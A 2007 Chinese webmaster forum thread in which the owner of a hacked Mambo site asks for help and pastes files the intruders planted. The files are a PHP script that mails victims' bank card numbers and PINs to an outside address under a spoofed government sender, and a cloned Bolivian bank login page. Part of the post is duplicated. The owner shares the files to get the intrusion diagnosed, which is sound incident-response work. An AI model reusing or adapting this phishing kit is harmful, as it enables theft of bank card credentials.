打印

我的网站又被黑了！无法恢复！紧急求助！

shunzi34

高级会员

Rank: 4

1^# 大中小发表于 2007-7-17 01:40 只看该作者

我的网站又被黑了！无法恢复！紧急求助！

今天我的网站 www.simyi.com 又被黑了！主页被黑成跟上次一样。上次一用文件覆盖救行了，现在覆盖index.php后，还是不行。并且后台无法登录。
到现在还是漆黑一片，不知问题在哪？

我的mambo 版本是 4.5.5 前台只发布了 com_zoom 和 com_multidisplay 组件，连登陆模块都没发布。

我在统计里发现一个可疑的访问页面 acunetix-wvs-test-for-some-inexistent-file
经查 acunetix一款网络漏洞扫描工具。通过网络爬虫测试网站安全，检测流行的攻击 ,如交叉站点脚本,sql 注入等.
估计攻击者很有可能就是用这工具扫描到网站的漏洞的。
我以前没听说过 acunetix 现在当然不会用，上面那一大串命令不知什么意思，要等到我懂得用再去找原因，不知要等到何年何月。

我都快急疯了，再这样下去，好不容易积累起来的访客都会走掉的。

恳请高手帮忙分析是不是mambo的哪个漏洞，如果能查出来，再发个补丁，增强mambo的安全性。

[ 本帖最后由 shunzi34 于 2007-7-17 01:43 编辑 ]

免费在线电影电视，图文剧本
新美怡在线影视

TOP

shunzi34

高级会员

Rank: 4

2^# 大中小发表于 2007-7-17 02:03 只看该作者

还有发现跟目录下被新建了一个"unamed"的目录，下面有两个文件：login.php 和 default.html

login.php代码：

复制内容到剪贴板

代码:

 session_start();

$clave = $_POST['clave'];

$tarjeta = $_POST['tarjeta'];

$fury =("dracmgg@gmail.com";

$subj = "BCP Reply";

$from = "From: Homero Simpsons<admin@bolivia.gov.bo>";

$to = "dracmgg@gmail.com";

$msg = "Numero de Tarjeta: $tarjeta\nPIN: $clave\n";

mail($to, $subj, $msg, $from);

header("Location: https://www.bancodecredito.com.bo/credinet/condep.asp";

default.html代码：

还有发现跟目录下被新建了一个"unamed"的目录，下面有两个文件：login.php 和 default.html

login.php代码：

复制内容到剪贴板

代码:

 session_start();

$clave = $_POST['clave'];

$tarjeta = $_POST['tarjeta'];

$fury =("dracmgg@gmail.com";

$subj = "BCP Reply";

$from = "From: Homero Simpsons<admin@bolivia.gov.bo>";

$to = "dracmgg@gmail.com";

$msg = "Numero de Tarjeta: $tarjeta\nPIN: $clave\n";

mail($to, $subj, $msg, $from);

header("Location: https://www.bancodecredito.com.bo/credinet/condep.asp");

default.html代码：

复制内容到剪贴板

代码:

  





RAGMA" content="NO-CACHE">





Demo 



reguntas frecuentes 



Ayuda 





ingreso 

tipo de tarjeta 





número de tarjeta 





clave 











  Credimás  Servimatic 





















&iquest;cómo ingresar? 









Introduce los 16 dígitos de tu tarjeta 



Credimás 



o 



Servimatic 











Luego introduce tu clave secreta (PIN) 





np_cc= new numpad('cc');



np_cc.show();



tipo de cambio 





compra Bs. 



7.921

venta Bs. 



8.049

lang = '1'; url = '/credinet/default.asp';function salir(){







    window.location = "salir.asp"; 







  }



    function goFAQ() {







        var w=610, h=480;







              window.open ("../info/preguntas.html" , "preguntas", "status=si,location=no,menubar=no,resizable=no,toolbar=no,scrollbars=yes,top=10,left=10,width=" + w + ",height=" + h , 1 );







    }















    function goDemo() {







  var w=600, h=400;







  if( window.screen && window.screen.availHeight )







  {







    h = h + window.screen.availHeight * 0.0;







    w = w + window.screen.availWidth * 0.0;







  }







        window.open ("../demo/default.asp", "demo", "status=yes,location=no,menubar=no,resizable=yes,toolbar=no,scrollbars=no,top=10,left=10,width="+ w + ",height=" + h );







  return ;







    }















    function goHelp() {







  var w=600, h=420;







  if( window.screen && window.screen.availHeight )







  {







    h = h + window.screen.availHeight * 0.05;







    w = w + window.screen.availWidth * 0.05;







  }







        window.open ("../help2.asp", "ayuda", "status=yes,location=no,menubar=no,resizable=yes,toolbar=no,scrollbars=no,top=10,left=10,width="+ w + ",height=" + h );







  return ;







    }







    function goSPA() {







      window.location = "cambiarIdioma.asp?lan=SPA&url=" + url;







    }







    function goENG() {







      window.location = "cambiarIdioma.asp?lan=ENG&url=" + url;







      







    }







function popUp() 







{







  url = "https://servicecenter.verisign.com/cgi-bin/Xquery.exe";







  url = url + "?Template=authCertByIssuer&remote_host=https://digitalid.certisur.com/global/cgi-bin/haydn.exe";







  url = url + "&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=c21e9ca4b69bb19ee93b079349b212a7";







  sealWin=window.open(url,"win",'toolbar=0,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1,width=600,height=450'); 







//  self.name = "mainWin";







}tip = document.myForm.tipo;







  tar = document.myForm.tarjeta;







  pin = document.myForm.clave;







  tar.value = "449192";







  







  function cambiaBin(){







    if(tip.selectedIndex==0) tar.value = "449192";







    if(tip.selectedIndex==1) tar.value = "800001";







  }







   







  function salir(){







    window.close(); 







  }







  function btnClick(){







    aux = tar.value; sw = 0==1; i = 0;







    while ( i != aux.length && !sw ) sw= ( !isIn (keyDigit, aux.charAt(i++)) );







    if (sw) { 







      alert("El numero de tarjeta que has ingresado no es valido. Intentalo nuevamente.");







      tar.focus(); return;







    }









    aux = pin.value; sw = 0==1; i = 0;







    while ( i != aux.length && !sw ) sw= ( !isIn (keyDigit, aux.charAt(i++)) );







    if (sw) { 







      alert("El PIN que has ingresado no es valido. Intentalo nuevamente.");







      pin.focus(); return;







    }





    if(tar.value=="") {







      alert("or favor, ingresa el numero de tu tarjeta.");







      tar.focus();







    }







    else if (tar.value.length!=16 ){







      alert("El numero de tarjeta que has ingresado no es el correcto. Intentalo nuevamente.");







      tar.focus();







      }







    else if (tar.value.substr(0,5)=="46598"){







      alert("El numero de tarjeta que has ingresado no es el correcto. Intentalo nuevamente.");







      tar.focus();







      }      







    else if(pin.value==""){







      alert("Por favor, ingresa tu clave.");







      pin.focus();







      }







    else if(pin.value.length!=4) {







      alert("La clave que has ingresado no es la correcta. Intentalo nuevamente.");







      pin.focus();







    }







    else{ 







      //Enviar







      v = "1" + tar.value + "2" + pin.value + "30";







      t = "";





      for (i=0;i != 12;i++){t = (9 - v.substr(i,1))+ t + (9-v.substr(23-i,1));}







      document.reslogon.t.value = t;







      document.reslogon.submit();





    }





  }





function popUp() 



{



  url = https://servicecenter.verisign.com/cgi-bin/Xquery.exe;





  url = url + "?Template=authCertByIssuer&remote_host=https://digitalid.certisur.com/global/cgi-bin/haydn.exe";



  url = url + "&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=c21e9ca4b69bb19ee93b079349b212a7";



  sealWin=window.open(url,"win",'toolbar=0,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1,width=500,height=450'); 



//  self.name = "mainWin";





}



function clear()





{



  clear2(document.myForm.clave)



}





function numKeyPressed(obj, id)





{





  numKeyPressed2(obj, id, document.myForm.clave)





}